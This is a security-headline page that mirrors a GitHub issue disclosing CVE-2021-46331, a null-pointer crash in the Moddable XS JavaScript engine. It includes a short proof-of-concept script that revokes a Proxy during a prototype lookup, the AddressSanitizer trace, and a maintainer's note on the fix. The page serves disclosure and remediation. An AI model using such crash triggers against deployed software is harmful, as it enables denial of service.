Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46331: SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype · Issue #750 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsProxy.c in fxProxyGetPrototype.

CVE
Open in Source
#vulnerability#ubuntu#linux#js#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype #750

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

Comments

@hope-fly

Moddable-XS revision

Commit: db8f973

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

cd ~/moddable/xs/makefiles/lin #(debug) make -f xst.mk

Test case

function JSEtest(proxyTarget) { var { proxy, revoke } = Proxy.revocable(proxyTarget, new Proxy({}, { get(target, propertyKey, receiver) { revoke(); } })); return proxy; }

Object.getPrototypeOf(JSEtest({}));

Execution & Output

$ ./moddable/build/bin/lin/debug/xst poc.js

ASAN:DEADLYSIGNAL

==68595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x55aceefcfbc1 bp 0x7ffebf0ad710 sp 0x7ffebf0ad6c0 T0) ==68595==The signal is caused by a READ memory access. ==68595==Hint: address points to the zero page. #0 0x55aceefcfbc0 in fxProxyGetPrototype /root/moddable/xs/sources/xsProxy.c:506 #1 0x55acef001f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #2 0x55acef06cc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #3 0x55acef27e90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #4 0x55aceeba54c7 in main /root/moddable/xs/tools/xst.c:281 #5 0x7f00319aabf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x55aceeba70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsProxy.c:506 in fxProxyGetPrototype ==68595==ABORTING

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

@phoddie

Copy link

Collaborator

@phoddie phoddie commented Dec 21, 2021

This is a far reaching bug: the Proxy implementation was not defending against NULL target (e.g. a revoked proxy) in many paths. We have reviewed the implementation to try to resolve all of those.

2 participants

@phoddie@hope-fly

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE